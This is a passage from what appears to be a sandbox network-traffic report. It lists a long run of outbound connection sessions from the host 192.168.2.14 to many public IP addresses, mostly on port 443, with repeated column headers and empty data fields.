                                      14770192.168.2.144259065.116.85.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14771192.168.2.145261674.241.24.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14772192.168.2.1447632153.196.238.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14773192.168.2.1435554196.167.48.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14774192.168.2.1459444213.27.228.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14775192.168.2.143399868.213.184.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14776192.168.2.1441252121.245.124.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14777192.168.2.1457102155.242.238.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14778192.168.2.1434084159.134.48.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14779192.168.2.145912484.156.209.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14780192.168.2.1442258111.91.43.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14781192.168.2.145865865.188.176.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14782192.168.2.14419881.73.179.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14783192.168.2.1449584128.191.91.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14784192.168.2.145670299.236.154.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14785192.168.2.144467662.78.93.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14786192.168.2.1443582130.8.216.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14787192.168.2.144885066.56.153.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14788192.168.2.143632090.2.114.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14789192.168.2.1440774156.116.143.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14790192.168.2.1445370164.38.222.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14791192.168.2.1451238199.243.115.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14792192.168.2.1442192139.244.135.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14793192.168.2.1439578103.72.126.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14794192.168.2.1453536146.47.38.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14795192.168.2.1450768210.67.143.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14796192.168.2.143372457.88.152.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14797192.168.2.1448032102.207.182.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14798192.168.2.1454360186.152.63.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14799192.168.2.1451768219.142.159.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14800192.168.2.1451980104.82.135.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14801192.168.2.145257285.34.218.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14802192.168.2.144749243.107.59.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14803192.168.2.143976027.238.188.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14804192.168.2.144420649.19.43.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14805192.168.2.145123481.234.44.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14806192.168.2.1455044164.211.42.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14807192.168.2.1436676168.210.57.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14808192.168.2.1458676118.134.5.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14809192.168.2.1450662129.130.49.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14810192.168.2.145670838.246.6.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14811192.168.2.146016037.20.19.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14812192.168.2.144506898.12.68.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14813192.168.2.1439678114.220.2.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14814192.168.2.143522659.246.241.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14815192.168.2.1455852125.129.252.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14816192.168.2.1457596116.35.173.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14817192.168.2.144608652.172.210.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14818192.168.2.144340897.109.83.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14819192.168.2.1452290189.176.140.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14820192.168.2.145765284.209.198.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14821192.168.2.1455582108.254.196.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14822192.168.2.144974618.180.62.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14823192.168.2.1458172144.92.186.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14824192.168.2.1441584172.99.11.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14825192.168.2.144279876.251.27.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14826192.168.2.1435092188.162.4.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14827192.168.2.1458068169.169.111.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14828192.168.2.1448586142.226.161.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14829192.168.2.1446164186.34.92.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14830192.168.2.146060481.26.98.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14831192.168.2.1448758153.40.242.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14832192.168.2.1438822150.82.116.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14833192.168.2.1458608169.187.27.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14834192.168.2.1438796180.90.187.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14835192.168.2.1442620190.235.43.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14836192.168.2.1447914190.125.3.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14837192.168.2.145103681.95.0.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14838192.168.2.144635081.7.13.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14839192.168.2.1445190134.44.62.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14840192.168.2.1442512100.203.94.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14841192.168.2.1455246219.98.17.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14842192.168.2.1459570118.77.208.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14843192.168.2.14421508.203.146.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14844192.168.2.1447514128.82.245.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14845192.168.2.144967854.155.50.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14846192.168.2.1434714118.239.251.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14847192.168.2.14393444.167.122.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14848192.168.2.1435014135.163.5.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14849192.168.2.1443998180.117.121.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14850192.168.2.1433356180.28.181.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14851192.168.2.1449252213.16.78.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14852192.168.2.1448530193.119.119.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14853192.168.2.1452946138.87.197.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14854192.168.2.144462277.92.82.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14855192.168.2.146065682.243.45.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14856192.168.2.143597436.166.177.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14857192.168.2.1455022223.235.28.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14858192.168.2.1443710171.236.240.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14859192.168.2.145218051.247.178.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14860192.168.2.145011294.85.87.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14861192.168.2.1453478193.186.201.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14862192.168.2.1445502217.21.190.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14863192.168.2.145747025.160.107.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14864192.168.2.145200492.221.46.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14865192.168.2.1454284101.90.122.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14866192.168.2.1445914192.126.149.278080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14867192.168.2.1433532212.194.195.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14868192.168.2.143892692.112.37.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14869192.168.2.1456176131.175.181.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14870192.168.2.1438040167.46.77.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14871192.168.2.145415857.21.109.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14872192.168.2.145534088.137.163.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14873192.168.2.1437686119.173.140.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14874192.168.2.1458728174.165.120.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14875192.168.2.145411667.173.137.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14876192.168.2.143980663.43.173.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14877192.168.2.143430471.168.44.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14878192.168.2.144684697.128.195.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14879192.168.2.144923095.165.230.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14880192.168.2.144633053.183.176.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14881192.168.2.1445040170.176.28.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14882192.168.2.14401701.45.143.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14883192.168.2.1441380178.179.210.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14884192.168.2.1455706101.177.65.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14885192.168.2.1454930185.253.44.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14886192.168.2.145381867.137.49.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14887192.168.2.144747677.193.229.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14888192.168.2.144053017.19.206.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14889192.168.2.1455466145.208.75.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14890192.168.2.1440574122.106.234.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14891192.168.2.143380277.103.84.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14892192.168.2.14355229.198.25.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14893192.168.2.1435248105.244.70.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14894192.168.2.1454926213.195.178.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14895192.168.2.143379423.227.25.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14896192.168.2.144910444.111.161.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14897192.168.2.1450628197.67.58.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14898192.168.2.145527852.96.167.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14899192.168.2.144091052.192.127.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14900192.168.2.144090037.202.198.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14901192.168.2.1439254153.37.173.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14902192.168.2.1435442123.38.241.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14903192.168.2.145304271.175.214.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14904192.168.2.144063480.95.227.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14905192.168.2.1435492101.107.167.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14906192.168.2.1454838153.43.24.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14907192.168.2.1455994182.64.178.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14908192.168.2.1458694171.193.210.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14909192.168.2.145327660.37.202.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14910192.168.2.1458080196.146.67.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14911192.168.2.1455128141.15.48.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14912192.168.2.143886617.156.141.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14913192.168.2.144427853.223.243.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14914192.168.2.1446714137.152.0.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14915192.168.2.1455132183.9.64.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14916192.168.2.1458642169.73.220.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14917192.168.2.1458118209.236.13.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14918192.168.2.145386480.149.80.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14919192.168.2.1433852115.52.24.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14920192.168.2.1451662170.12.125.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14921192.168.2.1433578159.178.9.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14922192.168.2.145210446.208.19.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14923192.168.2.1456002125.199.221.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14924192.168.2.1459268216.19.199.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14925192.168.2.144399899.56.120.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14926192.168.2.143510076.248.6.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14927192.168.2.143365239.3.36.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14928192.168.2.145049451.102.32.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14929192.168.2.1446986161.90.180.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14930192.168.2.1453350114.76.216.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14931192.168.2.1438412104.230.21.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14932192.168.2.143292283.108.46.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14933192.168.2.143489883.48.3.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14934192.168.2.1457076178.112.9.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14935192.168.2.1442978166.225.119.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14936192.168.2.144627075.146.78.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14937192.168.2.1446508126.12.226.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14938192.168.2.1440140140.80.56.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14939192.168.2.1449956168.76.254.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14940192.168.2.1457960153.213.13.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14941192.168.2.1449870163.70.71.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14942192.168.2.144064496.4.215.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14943192.168.2.1448028212.128.43.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14944192.168.2.1460432102.196.220.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14945192.168.2.1436906114.89.93.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14946192.168.2.1449660120.244.23.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14947192.168.2.145722248.194.136.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14948192.168.2.1457190162.131.160.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14949192.168.2.1438480188.97.4.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14950192.168.2.1438754163.137.52.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14951192.168.2.1460278157.112.155.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14952192.168.2.145572417.216.122.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14953192.168.2.1451958109.210.175.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14954192.168.2.1441282223.32.165.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14955192.168.2.143772831.46.189.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14956192.168.2.143938843.241.123.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14957192.168.2.145287695.203.178.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14958192.168.2.145230888.179.46.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14959192.168.2.1435634110.184.92.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14960192.168.2.144101652.108.87.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14961192.168.2.1444664198.36.201.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14962192.168.2.145640638.155.95.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14963192.168.2.1445160164.226.123.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14964192.168.2.143658271.215.229.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14965192.168.2.143421484.39.149.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14966192.168.2.145393487.66.223.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14967192.168.2.1457286170.3.234.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14968192.168.2.1444342121.202.188.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14969192.168.2.1449758106.156.237.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14970192.168.2.143310819.92.94.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14971192.168.2.1438202128.240.38.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14972192.168.2.1449384167.196.205.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14973192.168.2.1433906188.86.108.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14974192.168.2.145198231.92.201.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14975192.168.2.14573921.5.20.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14976192.168.2.1448896149.146.128.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14977192.168.2.143320017.230.71.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14978192.168.2.145405419.98.36.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14979192.168.2.144248836.87.96.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14980192.168.2.1446716148.42.234.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14981192.168.2.143315695.186.27.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14982192.168.2.144175462.69.124.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14983192.168.2.1455120182.214.134.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14984192.168.2.144159068.33.246.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14985192.168.2.1435596197.128.54.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14986192.168.2.1441694122.91.232.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14987192.168.2.143559842.20.220.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14988192.168.2.143647490.139.36.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14989192.168.2.144831247.69.146.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14990192.168.2.1436728107.41.244.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14991192.168.2.1445232133.149.127.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
